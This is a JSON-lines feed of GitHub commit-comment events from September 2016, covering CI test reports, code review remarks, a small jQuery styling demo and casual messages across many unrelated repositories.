{"id":"4571630905","type":"CommitCommentEvent","actor":{"login":"eddelbuettel"},"repo":{"name":"baptiste/rcppfaddeeva"},"payload":{"comment":{"id":19047004,"position":null,"line":null,"path":null,"commit_id":"ec718244e05c53909d8e4350feccb89cac0a0d25","created_at":"2016-09-16T00:52:03Z","updated_at":"2016-09-16T00:52:03Z","body":"Should have added it here -- this commit added .DS_Store in two directories.\r\n\r\n`git -A` considered evil ..."}},"created_at":"2016-09-16T00:52:03Z"}
{"id":"4571635288","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19047020,"position":null,"line":null,"path":null,"commit_id":"e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff","created_at":"2016-09-16T00:53:42Z","updated_at":"2016-09-16T00:53:42Z","body":"ASIHPValidation (shenb) - Win64-Windows-7-VisualStudio-12: OK (2333 of 2334 tests passed, 21 test warnings)\n\n * 22 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T00:53:42Z"}
{"id":"4571639332","type":"CommitCommentEvent","actor":{"login":"mutec"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19047030,"position":34,"line":62,"path":"files/lib/data/package/PackageCache.class.php","commit_id":"3b1f0c53fb4fc70e869f2891cf0ddcafca5c4322","created_at":"2016-09-16T00:55:15Z","updated_at":"2016-09-16T00:55:15Z","body":"Bad eclipse! :D"}},"created_at":"2016-09-16T00:55:15Z"}
{"id":"4571642166","type":"CommitCommentEvent","actor":{"login":"jmattsson"},"repo":{"name":"DiUS/nodemcu-firmware"},"payload":{"comment":{"id":19047034,"position":null,"line":null,"path":null,"commit_id":"0cb7b7dc92d5ac575eb9d52a883c151440350806","created_at":"2016-09-16T00:56:20Z","updated_at":"2016-09-16T00:56:20Z","body":"At least session ticket support is something that could be enabled if we want to pay the size cost. Same with the ephemeral keys, *I think*. What you see there is the Espressif default configuration of mbedtls."}},"created_at":"2016-09-16T00:56:20Z"}
{"id":"4571643938","type":"CommitCommentEvent","actor":{"login":"cjberry3"},"repo":{"name":"cjberry3/ame220classRepo"},"payload":{"comment":{"id":19047036,"position":1,"line":1,"path":"README.md","commit_id":"2fb80bfd78dc32191061a1aa579306db8eac8f89","created_at":"2016-09-16T00:57:04Z","updated_at":"2016-09-16T00:57:04Z","body":"<!doctype html>\r\n<html>\r\n\r\n<head>\r\n  <style>\r\n  </style>\r\n\r\n  <script\r\n  src=\"https://code.jquery.com/jquery-3.1.0.js\"\r\n      integrity=\"sha256-slogkvB1K3VOkzAI8QITxV3VzpOnkeNVsKvtkYLMjfk=\"\r\n    crossorigin=\"anonymous\"></script>\r\n\r\n  <script>\r\n    function inputChanged(){\r\n      var x = $(\"#width\").val() + \"px\";\r\n      $(\"#result\").css(\"width\", x );\r\n      var x = \"#\" +  $(\"#background-color\").val();\r\n      $(\"#result\").css(\"background-color\", x );\r\n      var x = $(\"#height\").val() + \"px\";\r\n      $(\"#result\").css(\"height\", x );\r\n    }\r\n\r\n  </script>\r\n</head>\r\n\r\n<body>\r\n  <label for='width'> width </label>\r\n  <input onchange='inputChanged()' type='number' id='width'>\r\n  <span> px </span>\r\n  <br>\r\n  <label for='background-color'> background-color #</label>\r\n  <input onchange='inputChanged()' type='text' id='background-color'>\r\n  <br>\r\n\r\n  <label for='height'> height </label>\r\n  <input onchange='inputChanged()' type='number' id='height'>\r\n  <span> px </span>\r\n  <br>\r\n\r\n  <div id='result' style='border-style:solid;height:100px;width:100px;background:gray'> </div>\r\n</body>\r\n\r\n</html>\r\n"}},"created_at":"2016-09-16T00:57:04Z"}
{"id":"4571644451","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19047038,"position":null,"line":null,"path":null,"commit_id":"1baf20928e190562630492000c923a3ac0217c9d","created_at":"2016-09-16T00:57:16Z","updated_at":"2016-09-16T00:57:16Z","body":"FixAgainCentroidForNonConvex (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1764 of 1765 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-16T00:57:16Z"}
{"id":"4571647724","type":"CommitCommentEvent","actor":{"login":"erinmorrissey"},"repo":{"name":"teamdeepblue/caissa-chess"},"payload":{"comment":{"id":19047047,"position":23,"line":14,"path":"app/models/piece.rb","commit_id":"94e25b33583e47c23daa592bc6ed0ab910f19696","created_at":"2016-09-16T00:58:33Z","updated_at":"2016-09-16T00:58:33Z","body":"Nice work, Ernie! Took a while to click, tough ticket. Is there a reason the range in line 14 ends with x_destination, but the same line in the moving_vertically? case ends with y_end? Can't figure out if that was intentional or not but would think those two cases would work the same..."}},"created_at":"2016-09-16T00:58:33Z"}
{"id":"4571648914","type":"CommitCommentEvent","actor":{"login":"MAmelia"},"repo":{"name":"MAmelia/gustavo"},"payload":{"comment":{"id":19047049,"position":null,"line":null,"path":null,"commit_id":"8d9b7adf22c2002ad7e0fd8221df4a16a4c979ff","created_at":"2016-09-16T00:59:02Z","updated_at":"2016-09-16T00:59:02Z","body":"teste"}},"created_at":"2016-09-16T00:59:02Z"}
{"id":"4571649182","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"bsclifton/browser-laptop"},"payload":{"comment":{"id":19047052,"position":38,"line":119,"path":"js/stores/eventStore.js","commit_id":"95ec2aeb5a47551e6c5b6bf11399fd731d5eeb5f","created_at":"2016-09-16T00:59:08Z","updated_at":"2016-09-16T00:59:08Z","body":"I'm pretty sure this should always be `newURL`. The `originalURL` may be a redirect and the `newURL` should be the same url that we would get for the page load"}},"created_at":"2016-09-16T00:59:08Z"}
{"id":"4571651933","type":"CommitCommentEvent","actor":{"login":"fowlslegs"},"repo":{"name":"firstlookmedia/gpgsync"},"payload":{"comment":{"id":19047061,"position":null,"line":null,"path":null,"commit_id":"7d1520786a2586a06a16fcf173ad31fbc5b07cc6","created_at":"2016-09-16T01:00:07Z","updated_at":"2016-09-16T01:00:07Z","body":":+1: "}},"created_at":"2016-09-16T01:00:07Z"}
{"id":"4571653845","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"bsclifton/browser-laptop"},"payload":{"comment":{"id":19047066,"position":4,"line":13,"path":"js/stores/eventStore.js","commit_id":"95ec2aeb5a47551e6c5b6bf11399fd731d5eeb5f","created_at":"2016-09-16T01:00:45Z","updated_at":"2016-09-16T01:00:45Z","body":"I think we want to break this out from ledgerUtil. It's ok for ledger to depend on eventStore, but there shouldn't be dependencies in the other direction"}},"created_at":"2016-09-16T01:00:45Z"}
{"id":"4571654742","type":"CommitCommentEvent","actor":{"login":"whagi"},"repo":{"name":"whagi/hello-world"},"payload":{"comment":{"id":19047069,"position":null,"line":null,"path":null,"commit_id":"10d7b5d5830a4a172c3f673dcbb1ac7dd8bd32c7","created_at":"2016-09-16T01:01:04Z","updated_at":"2016-09-16T01:01:04Z","body":"kommentar zu 1änderg."}},"created_at":"2016-09-16T01:01:04Z"}
{"id":"4571655145","type":"CommitCommentEvent","actor":{"login":"mutec"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19047070,"position":null,"line":null,"path":null,"commit_id":"f6826d608bfa76ba592dffb7847ea8e4662ae387","created_at":"2016-09-16T01:01:12Z","updated_at":"2016-09-16T01:01:12Z","body":"I'll have a look on that when I got more time. ^^\r\nI'm also not sure if this method will stay alife or will be killed and replaced. Going to think about that these days."}},"created_at":"2016-09-16T01:01:12Z"}
{"id":"4571656257","type":"CommitCommentEvent","actor":{"login":"whagi"},"repo":{"name":"whagi/hello-world"},"payload":{"comment":{"id":19047072,"position":null,"line":null,"path":null,"commit_id":"10d7b5d5830a4a172c3f673dcbb1ac7dd8bd32c7","created_at":"2016-09-16T01:01:38Z","updated_at":"2016-09-16T01:01:38Z","body":"komm 2"}},"created_at":"2016-09-16T01:01:38Z"}
{"id":"4571656651","type":"CommitCommentEvent","actor":{"login":"friedmud"},"repo":{"name":"libMesh/libmesh"},"payload":{"comment":{"id":19047074,"position":247,"line":441,"path":"src/mesh/nemesis_io_helper.C","commit_id":"c9d6f9f218b6e9c8cbd40536a501371196aa8039","created_at":"2016-09-16T01:01:46Z","updated_at":"2016-09-16T01:01:46Z","body":"Hmmm - I don't suppose you tried to compile this, eh?  😄 \r\n\r\n`current_processor_id` is just a member variable!  😉 \r\n\r\nI'll fix it up and modify my PR with the updated stuff.\r\n\r\nThanks for keeping up with the rebasing of my PR!"}},"created_at":"2016-09-16T01:01:46Z"}
{"id":"4571657167","type":"CommitCommentEvent","actor":{"login":"beaubellamy"},"repo":{"name":"beaubellamy/wagonMovements"},"payload":{"comment":{"id":19047079,"position":null,"line":null,"path":null,"commit_id":"9ac7587dbcbd663919edb185bccdd258c38ab656","created_at":"2016-09-16T01:01:59Z","updated_at":"2016-09-16T01:01:59Z","body":"I'm having trouble creating a wagonDetails object that can then be populated from reading the file and then added to the list.\r\nThe local object is inaccessible due to the protection level of the class, but the protection level is public?"}},"created_at":"2016-09-16T01:01:59Z"}
{"id":"4571659982","type":"CommitCommentEvent","actor":{"login":"varnion"},"repo":{"name":"ifanrx/django-dajaxice"},"payload":{"comment":{"id":19047085,"position":7,"line":60,"path":"dajaxice/views.py","commit_id":"98c543949a377b78d3cf3c67b6896bc811205a88","created_at":"2016-09-16T01:03:05Z","updated_at":"2016-09-16T01:03:05Z","body":"Funny, this seemed to have worked in the tests (or maybe they dont cover this part):\r\nhttps://travis-ci.org/varnion/django-dajaxice-ng.\r\n\r\neither way, the only change I made here was to raise the adequate exception."}},"created_at":"2016-09-16T01:03:05Z"}
{"id":"4571663089","type":"CommitCommentEvent","actor":{"login":"varnion"},"repo":{"name":"ifanrx/django-dajaxice"},"payload":{"comment":{"id":19047087,"position":14,"line":72,"path":"dajaxice/finders.py","commit_id":"98c543949a377b78d3cf3c67b6896bc811205a88","created_at":"2016-09-16T01:04:14Z","updated_at":"2016-09-16T01:04:14Z","body":"... and here is a change I introduced. This comparison (\"<\") seems to be working, while \">\"  doesnt.\r\n"}},"created_at":"2016-09-16T01:04:14Z"}
{"id":"4571663639","type":"CommitCommentEvent","actor":{"login":"MustafaMustafa"},"repo":{"name":"MustafaMustafa/star-picoDst"},"payload":{"comment":{"id":19047088,"position":7,"line":4,"path":"StPicoDstMaker/StPicoArrays.h","commit_id":"d883e4fa33c3b7d9e68a1dbfb6d67c7cc5164fe0","created_at":"2016-09-16T01:04:28Z","updated_at":"2016-09-16T01:04:28Z","body":"This is what we discussed this morning. \r\nBut.... it gets messy very quickly. See comments below."}},"created_at":"2016-09-16T01:04:28Z"}
{"id":"4571665632","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19047095,"position":null,"line":null,"path":null,"commit_id":"cb98df6114867e749107203cefef53f45dcb502c","created_at":"2016-09-16T01:05:14Z","updated_at":"2016-09-16T01:05:14Z","body":"Related to: backdrop/backdrop-issues#2195 "}},"created_at":"2016-09-16T01:05:14Z"}
{"id":"4571666082","type":"CommitCommentEvent","actor":{"login":"erniejamison"},"repo":{"name":"teamdeepblue/caissa-chess"},"payload":{"comment":{"id":19047097,"position":23,"line":14,"path":"app/models/piece.rb","commit_id":"94e25b33583e47c23daa592bc6ed0ab910f19696","created_at":"2016-09-16T01:05:23Z","updated_at":"2016-09-16T01:05:23Z","body":"Hi Erin,\n\nIt's is a typo. Are you looking at the latest commit? I believe there are\n3. My local code has them both with destination.\n\nThanks,\nErnie\n\nOn Thu, Sep 15, 2016 at 8:58 PM, Erin Morrissey <notifications@github.com>\nwrote:\n\n> Nice work, Ernie! Took a while to click, tough ticket. Is there a reason\n> the range in line 14 ends with x_destination, but the same line in the\n> moving_vertically? case ends with y_end? Can't figure out if that was\n> intentional or not but would think those two cases would work the same...\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/teamdeepblue/caissa-chess/commit/94e25b33583e47c23daa592bc6ed0ab910f19696#commitcomment-19047047>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AP03FSzFqdA7KajfIO6r2rA7LhK-Kj6Rks5qqem6gaJpZM4J-gXo>\n> .\n>\n"}},"created_at":"2016-09-16T01:05:23Z"}
{"id":"4571666828","type":"CommitCommentEvent","actor":{"login":"MustafaMustafa"},"repo":{"name":"MustafaMustafa/star-picoDst"},"payload":{"comment":{"id":19047099,"position":8,"line":632,"path":"StPicoDstMaker/StPicoDstMaker.cxx","commit_id":"d883e4fa33c3b7d9e68a1dbfb6d67c7cc5164fe0","created_at":"2016-09-16T01:05:42Z","updated_at":"2016-09-16T01:05:42Z","body":"@plexoos\r\nHere where it gets messy. I can access the method using StPicoDst::picoArray. But it still messy."}},"created_at":"2016-09-16T01:05:42Z"}
{"id":"4571668106","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19047101,"position":null,"line":null,"path":null,"commit_id":"3d442c4b95cbdd7ddabdc10c3cfb5ca3865a9535","created_at":"2016-09-16T01:06:11Z","updated_at":"2016-09-16T01:06:11Z","body":"Manufacture limit is not working. Probably has something to do with an .iff file in a .tre as all relevant .CPPs and LUAs have been changed"}},"created_at":"2016-09-16T01:06:11Z"}
{"id":"4571668949","type":"CommitCommentEvent","actor":{"login":"mfzeidan"},"repo":{"name":"rvisio/584_data_mining"},"payload":{"comment":{"id":19047104,"position":null,"line":null,"path":null,"commit_id":"cfe2e59eedd088ddf979d45e8404e0820adb35a8","created_at":"2016-09-16T01:06:29Z","updated_at":"2016-09-16T01:06:29Z","body":"interested in playing with this code. any chance you can post your raw files please :)"}},"created_at":"2016-09-16T01:06:29Z"}
{"id":"4571669110","type":"CommitCommentEvent","actor":{"login":"MustafaMustafa"},"repo":{"name":"MustafaMustafa/star-picoDst"},"payload":{"comment":{"id":19047105,"position":36,"line":653,"path":"StPicoDstMaker/StPicoDstMaker.cxx","commit_id":"d883e4fa33c3b7d9e68a1dbfb6d67c7cc5164fe0","created_at":"2016-09-16T01:06:33Z","updated_at":"2016-09-16T01:06:33Z","body":"@plexoos, \r\nThe other option is to do the static cast in place. Like this one."}},"created_at":"2016-09-16T01:06:33Z"}
{"id":"4571671451","type":"CommitCommentEvent","actor":{"login":"rmortan"},"repo":{"name":"rmortan/INTRO"},"payload":{"comment":{"id":19047106,"position":null,"line":null,"path":null,"commit_id":"11345d641cb40c8e9d54890128544df1c3b87211","created_at":"2016-09-16T01:07:09Z","updated_at":"2016-09-16T01:07:09Z","body":"o kkk yall"}},"created_at":"2016-09-16T01:07:09Z"}
{"id":"4571673781","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19047113,"position":null,"line":null,"path":null,"commit_id":"fb0866773c95279f1d5df11113fd2b651275293e","created_at":"2016-09-16T01:08:00Z","updated_at":"2016-09-16T01:08:00Z","body":"Related to: backdrop/backdrop-issues#2199 "}},"created_at":"2016-09-16T01:08:00Z"}
{"id":"4571677197","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19047118,"position":null,"line":null,"path":null,"commit_id":"3d442c4b95cbdd7ddabdc10c3cfb5ca3865a9535","created_at":"2016-09-16T01:09:21Z","updated_at":"2016-09-16T01:09:21Z","body":"Did you figure it out with the idl file or still not working ?"}},"created_at":"2016-09-16T01:09:21Z"}
{"id":"4571684561","type":"CommitCommentEvent","actor":{"login":"erniejamison"},"repo":{"name":"teamdeepblue/caissa-chess"},"payload":{"comment":{"id":19047137,"position":23,"line":14,"path":"app/models/piece.rb","commit_id":"94e25b33583e47c23daa592bc6ed0ab910f19696","created_at":"2016-09-16T01:12:11Z","updated_at":"2016-09-16T01:12:11Z","body":"My bad your right. Thanks for pointing it out."}},"created_at":"2016-09-16T01:12:11Z"}
{"id":"4571684830","type":"CommitCommentEvent","actor":{"login":"baptiste"},"repo":{"name":"baptiste/rcppfaddeeva"},"payload":{"comment":{"id":19047141,"position":null,"line":null,"path":null,"commit_id":"ec718244e05c53909d8e4350feccb89cac0a0d25","created_at":"2016-09-16T01:12:17Z","updated_at":"2016-09-16T01:12:17Z","body":"well spotted, thanks!"}},"created_at":"2016-09-16T01:12:17Z"}
{"id":"4571689203","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19047158,"position":null,"line":null,"path":null,"commit_id":"3d442c4b95cbdd7ddabdc10c3cfb5ca3865a9535","created_at":"2016-09-16T01:14:06Z","updated_at":"2016-09-16T01:14:06Z","body":"still not working even with the idl file changed and pushed"}},"created_at":"2016-09-16T01:14:06Z"}
{"id":"4571689587","type":"CommitCommentEvent","actor":{"login":"shaunkawano"},"repo":{"name":"konifar/droidkaigi2016"},"payload":{"comment":{"id":19047160,"position":null,"line":null,"path":null,"commit_id":"f917c3ef14033917d5db899862406b4e133d7798","created_at":"2016-09-16T01:14:14Z","updated_at":"2016-09-16T01:14:14Z","body":"✨ "}},"created_at":"2016-09-16T01:14:14Z"}
{"id":"4571691929","type":"CommitCommentEvent","actor":{"login":"jtojnar"},"repo":{"name":"yukulele/google-image"},"payload":{"comment":{"id":19047168,"position":null,"line":null,"path":null,"commit_id":"c5f6e1e9c3e641b27d5fac639c72f86ad8bbaa11","created_at":"2016-09-16T01:15:11Z","updated_at":"2016-09-16T01:15:11Z","body":"Hello, I see you translated an older version of my extension. If you are willing to translate [three new strings](https://github.com/jtojnar/google-image/blob/master/_locales/en/messages.json), I would gladly include your changes in the extension itself."}},"created_at":"2016-09-16T01:15:11Z"}
{"id":"4571697437","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19047187,"position":null,"line":null,"path":null,"commit_id":"a62e551bd7891a09b917d9044ebd2561bfefbd84","created_at":"2016-09-16T01:17:21Z","updated_at":"2016-09-16T01:17:21Z","body":"i see.. that would've been there in do first spawn twice. nice fix"}},"created_at":"2016-09-16T01:17:21Z"}
{"id":"4571699132","type":"CommitCommentEvent","actor":{"login":"MAmelia"},"repo":{"name":"tec-webII-2k11/jong"},"payload":{"comment":{"id":19047192,"position":null,"line":null,"path":null,"commit_id":"08cc1fcaa7fe263254f503139985ff45ce0c6832","created_at":"2016-09-16T01:17:59Z","updated_at":"2016-09-16T01:17:59Z","body":"Mas será que todas as pessoas querem fazer seus relatos? Melhorar o público-alvo!"}},"created_at":"2016-09-16T01:17:59Z"}
{"id":"4571702754","type":"CommitCommentEvent","actor":{"login":"SamSaffron"},"repo":{"name":"discourse/DiscourseMobile"},"payload":{"comment":{"id":19047196,"position":null,"line":null,"path":null,"commit_id":"40c6ed9730f366841f3eea1dea6c9013eda3f3df","created_at":"2016-09-16T01:19:21Z","updated_at":"2016-09-16T01:19:21Z","body":"yay ... thanks! "}},"created_at":"2016-09-16T01:19:21Z"}
{"id":"4571703472","type":"CommitCommentEvent","actor":{"login":"kevinkurpe"},"repo":{"name":"kevinkurpe/therma"},"payload":{"comment":{"id":19047197,"position":10,"line":37,"path":"print.js","commit_id":"62fac9af3768f9f01ba3dd9106f3e38d801ae2df","created_at":"2016-09-16T01:19:38Z","updated_at":"2016-09-16T01:19:38Z","body":"By pausing and calling itself, this effectively replaces the loop functionality that I needed while also addressing the dropped/missed connections to the printer as the loop functionality happened faster than the printer could handle."}},"created_at":"2016-09-16T01:19:38Z"}
{"id":"4571706946","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19047209,"position":null,"line":null,"path":null,"commit_id":"3d442c4b95cbdd7ddabdc10c3cfb5ca3865a9535","created_at":"2016-09-16T01:21:01Z","updated_at":"2016-09-16T01:21:01Z","body":"if it does not work out in the long run id revert the changes. Ill investigate more later on ."}},"created_at":"2016-09-16T01:21:01Z"}
{"id":"4571707084","type":"CommitCommentEvent","actor":{"login":"albertolin"},"repo":{"name":"albertolin/engine-to-live"},"payload":{"comment":{"id":19047210,"position":2,"line":2,"path":"README.md","commit_id":"39936341315e8e222b36b378051c1ba5e1ae4889","created_at":"2016-09-16T01:21:04Z","updated_at":"2016-09-16T01:21:04Z","body":"la intencion y voluntad"}},"created_at":"2016-09-16T01:21:04Z"}
{"id":"4571711366","type":"CommitCommentEvent","actor":{"login":"XD-DENG"},"repo":{"name":"yihengli/ECharts2Shiny"},"payload":{"comment":{"id":19047219,"position":null,"line":null,"path":null,"commit_id":"dc0f276238696a7269395eced82f3badfe38f726","created_at":"2016-09-16T01:22:31Z","updated_at":"2016-09-16T01:22:31Z","body":"Hi @yihengli . Sorry for having confused you. \r\n\r\nMy intention is to seek as much input as possible from other users, like you, since I believe myself is not capable enough to \"push\" this package further. \r\n\r\nThe \"pull request\" is a quite powerful feature of GitHub. It helps people collaborate on programming. If you don't know this feature yet, I would suggest you to have a look. It would be helpful, for your future works as well.\r\n\r\n"}},"created_at":"2016-09-16T01:22:31Z"}
{"id":"4571712180","type":"CommitCommentEvent","actor":{"login":"crazile"},"repo":{"name":"crazile/postcss-functions"},"payload":{"comment":{"id":19047226,"position":10,"line":13,"path":"index.js","commit_id":"5d876cc997b67e0346fd11e7045031182cbc27b6","created_at":"2016-09-16T01:22:49Z","updated_at":"2016-09-16T01:22:49Z","body":"Performance on [meteor-1.4-slow-build](https://github.com/crazile/meteor-1.4-slow-build):\r\n\r\nChanges | Build Time | Result\r\n--------- | ---------- | -------\r\nBefore | ~52s | Crashed (out of memory)\r\nAfter  | ~15s | Successful build\r\n\r\nPull request with tests is here: https://github.com/andyjansson/postcss-functions/pull/16"}},"created_at":"2016-09-16T01:22:49Z"}
{"id":"4571712333","type":"CommitCommentEvent","actor":{"login":"utkantan"},"repo":{"name":"utkantan/openhpi-test"},"payload":{"comment":{"id":19047227,"position":null,"line":null,"path":null,"commit_id":"01cd06747db266bd2c64b1cd057c2568484412e8","created_at":"2016-09-16T01:22:52Z","updated_at":"2016-09-16T01:22:52Z","body":"Changed the article of \"der Hauptstadt\" to \"die Hauptstadt\"  "}},"created_at":"2016-09-16T01:22:52Z"}
{"id":"4571713009","type":"CommitCommentEvent","actor":{"login":"konifar"},"repo":{"name":"konifar/droidkaigi2016"},"payload":{"comment":{"id":19047229,"position":null,"line":null,"path":null,"commit_id":"f917c3ef14033917d5db899862406b4e133d7798","created_at":"2016-09-16T01:23:06Z","updated_at":"2016-09-16T01:23:06Z","body":":muscle:"}},"created_at":"2016-09-16T01:23:06Z"}
{"id":"4571714975","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19047236,"position":31,"line":450,"path":"js/src/test/scala/BrowserTestSuite.scala","commit_id":"a90079807d43e0278a30bff2ee96a0bd46069a97","created_at":"2016-09-16T01:23:51Z","updated_at":"2016-09-16T01:23:51Z","body":"So, this test case works, right?"}},"created_at":"2016-09-16T01:23:51Z"}
{"id":"4571715819","type":"CommitCommentEvent","actor":{"login":"chesterjar"},"repo":{"name":"chesterjar/chesterjar"},"payload":{"comment":{"id":19047239,"position":2,"line":2,"path":"README.md","commit_id":"ae18c79e6b59b6f7783da92316098f210ba2dd90","created_at":"2016-09-16T01:24:11Z","updated_at":"2016-09-16T01:24:11Z","body":"UNIVERSITY OF ALBERTA- Chester Jar's CV/Cover Letter"}},"created_at":"2016-09-16T01:24:11Z"}
{"id":"4571716410","type":"CommitCommentEvent","actor":{"login":"dgarijo"},"repo":{"name":"perma-id/w3id.org"},"payload":{"comment":{"id":19047243,"position":null,"line":null,"path":null,"commit_id":"3123825d876f9d0ae75e3d2fd8182f5091a58dc9","created_at":"2016-09-16T01:24:25Z","updated_at":"2016-09-16T01:24:25Z","body":"Hi Silvio,\r\nI apologize, I added some comments on you old PR. We have an issue with rawgit, see https://github.com/perma-id/w3id.org/issues/394. We are encouraging everyone to use an alternative like gh-pages.I accepted your PR and then realized about this issue. Can you please open a new PR with this fixed?"}},"created_at":"2016-09-16T01:24:25Z"}
{"id":"4571716809","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":19047245,"position":null,"line":null,"path":null,"commit_id":"977d8b75fda86a007996944c81f6e1d0e1ea328b","created_at":"2016-09-16T01:24:35Z","updated_at":"2016-09-16T01:24:35Z","body":"cc @TeffenEllis "}},"created_at":"2016-09-16T01:24:35Z"}
{"id":"4571717249","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19047251,"position":null,"line":null,"path":null,"commit_id":"3d442c4b95cbdd7ddabdc10c3cfb5ca3865a9535","created_at":"2016-09-16T01:24:47Z","updated_at":"2016-09-16T01:24:47Z","body":"Works for me :)"}},"created_at":"2016-09-16T01:24:47Z"}
{"id":"4571717635","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-analytics-plugin"},"payload":{"comment":{"id":19047254,"position":null,"line":null,"path":null,"commit_id":"5324c81fd5d9aee2536ec89678d06a6a683eb919","created_at":"2016-09-16T01:24:56Z","updated_at":"2016-09-16T01:24:56Z","body":"👍 "}},"created_at":"2016-09-16T01:24:56Z"}
{"id":"4571718971","type":"CommitCommentEvent","actor":{"login":"BaronTommy"},"repo":{"name":"BaronTommy/test"},"payload":{"comment":{"id":19047257,"position":null,"line":null,"path":null,"commit_id":"6ca0338d6496108dd7b5b36445d3cce247150cf7","created_at":"2016-09-16T01:25:31Z","updated_at":"2016-09-16T01:25:31Z","body":"ええんおか？"}},"created_at":"2016-09-16T01:25:31Z"}
{"id":"4571719019","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":19047258,"position":6,"line":87,"path":"app/controllers/kaui/admin_tenants_controller.rb","commit_id":"c63b55d58a4fe9634eca35db14b800ea0d70f2bc","created_at":"2016-09-16T01:25:32Z","updated_at":"2016-09-16T01:25:32Z","body":"Ah ah. will remove ;-)"}},"created_at":"2016-09-16T01:25:32Z"}
{"id":"4571721797","type":"CommitCommentEvent","actor":{"login":"itsjaviaguilar"},"repo":{"name":"wangshijun/bootstrap-popover-picker"},"payload":{"comment":{"id":19047262,"position":null,"line":null,"path":null,"commit_id":"53a60afdc0e172d5c7a92c44e26fb6c7542ecc7c","created_at":"2016-09-16T01:26:40Z","updated_at":"2016-09-16T01:26:40Z","body":"Hi @wangshijun could you please unregister the plugin ? `bower unregister -f bootstrap-popover-picker` so I can register it on my own. This is causing me many problems right now.\r\n\r\nThanks"}},"created_at":"2016-09-16T01:26:40Z"}
{"id":"4571726516","type":"CommitCommentEvent","actor":{"login":"IsaacWeiss"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":19047282,"position":null,"line":null,"path":null,"commit_id":"1b7daeb3830fbc6b706610eb0f2fd19f419c5c7a","created_at":"2016-09-16T01:28:35Z","updated_at":"2016-09-16T01:28:35Z","body":"Is it intended that this change the symmetry of the dialog? Previously it was roughly balanced between left and right:\r\n\r\n![screen shot 2016-09-15 at 9 25 58 pm](https://cloud.githubusercontent.com/assets/11616153/18572687/43d6abd2-7b8b-11e6-850b-e0a651d201f4.png)\r\n\r\nNot so much now. The left is all stretched out:\r\n![screen shot 2016-09-15 at 9 26 10 pm](https://cloud.githubusercontent.com/assets/11616153/18572691/4e91505e-7b8b-11e6-899d-8be82cb45e54.png)"}},"created_at":"2016-09-16T01:28:35Z"}
